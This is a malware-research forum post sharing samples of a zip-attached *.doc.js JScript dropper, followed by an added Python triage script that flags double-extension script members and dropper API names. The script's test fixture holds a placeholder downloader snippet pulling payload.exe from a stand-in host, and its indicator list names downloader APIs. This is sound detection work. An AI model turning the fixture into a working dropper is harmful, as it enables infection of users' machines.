Dear Kernelmode-Community,
Some weeks ago I got some emails with malware attached from interfax.org. It was a zip archive that contains a *.doc.js file as a dropper for other binaries.
I want to share this case with you. Here is a quick overview:
You can read my full report on my blog http://en.nullday.de/it-sec/2015/11/29/ ... rs-part-1/. So I will make it short.
I attached a 7z archive to this post. You'll find in this archive:
3 directories with files:
executables (contains all executables that I could grab)
js-dropper (contains all JS droppers that I could collect)
payloads (the deobfuscated payload of all JS droppers)
and these two 'special' files:
download.sh (it's a script for downloading all executables via crafted wget calls. Created by me for collecting all executables)
whois-report.txt (whois report about all malicious hosts.. many Yahoo hosts (!!))
Attachments
password as usual
(1.29 MiB) Downloaded 65 times
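As an added example that is not part of the post or its attached archive: a small Python triage script for the attack vector described above (a zip attachment carrying a *.doc.js dropper). It opens the zip in memory without extracting to disk or executing anything, flags members whose name ends in a script or executable extension (and especially a double extension with a document decoy such as .doc.js), greps each member for API names typical of a JScript downloader, and records a SHA-256 so samples can be matched against a collection like the one in the attached archive. The sample zip, its file names, the script body and the URL in it are constructed placeholders, not the real dropper.

```python
import hashlib
import io
import zipfile
from pathlib import PurePosixPath

# Extensions Windows hands to WScript/cscript or runs directly on double-click.
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".exe", ".scr", ".cmd", ".bat"}
# Extensions commonly used as the decoy half of a double extension (e.g. report.doc.js).
DECOY_EXTS = {".doc", ".docx", ".pdf", ".xls", ".xlsx", ".txt", ".jpg"}
# Strings typical of a JScript downloader that fetches and runs a binary.
DROPPER_INDICATORS = [
    "ActiveXObject", "MSXML2.XMLHTTP", "ADODB.Stream", "WScript.Shell",
    "Scripting.FileSystemObject", "eval(", "unescape(", "String.fromCharCode",
]


def classify_name(name):
    """Reasons, from the file name alone, why a member looks like a script dropper."""
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    reasons = []
    if suffixes and suffixes[-1] in SCRIPT_EXTS:
        reasons.append("script/executable extension " + suffixes[-1])
        if len(suffixes) >= 2 and suffixes[-2] in DECOY_EXTS:
            reasons.append("double extension with decoy " + suffixes[-2])
    return reasons


def find_indicators(content):
    """Dropper-style API names present in the member's bytes (decoded loosely as latin-1)."""
    text = content.decode("latin-1")
    return [ind for ind in DROPPER_INDICATORS if ind in text]


def scan_zip_bytes(data, max_member_size=5 * 1024 * 1024):
    """Scan an in-memory zip; nothing is written to disk or executed.

    Returns {member_name: {"sha256": ..., "reasons": [...], "indicators": [...]}}
    for every member flagged by name or by content.
    """
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            # Skip directories and oversized members (cheap zip-bomb guard).
            if info.is_dir() or info.file_size > max_member_size:
                continue
            reasons = classify_name(info.filename)
            content = zf.read(info)
            indicators = find_indicators(content)
            if reasons or indicators:
                findings[info.filename] = {
                    "sha256": hashlib.sha256(content).hexdigest(),
                    "reasons": reasons,
                    "indicators": indicators,
                }
    return findings


def build_constructed_sample():
    """Constructed test archive shaped like the post's attachment: a *.doc.js
    dropper plus a harmless file. The script body and URL are invented
    placeholders (example.invalid), not the real dropper."""
    dropper = (
        b'var h = new ActiveXObject("MSXML2.XMLHTTP");\n'
        b'h.open("GET", "http://example.invalid/payload.exe", false);\n'
        b'var s = new ActiveXObject("ADODB.Stream");\n'
        b'var sh = new ActiveXObject("WScript.Shell");\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice_2015-11.doc.js", dropper)
        zf.writestr("readme.txt", b"nothing to see here\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name, f in scan_zip_bytes(build_constructed_sample()).items():
        print(name, f["sha256"][:16], f["reasons"], f["indicators"])
```

The name check and the content check are kept separate on purpose: a dropper renamed to a plain .js still trips the first, and a .txt that is really a script (to be renamed by a second stage) still trips the second.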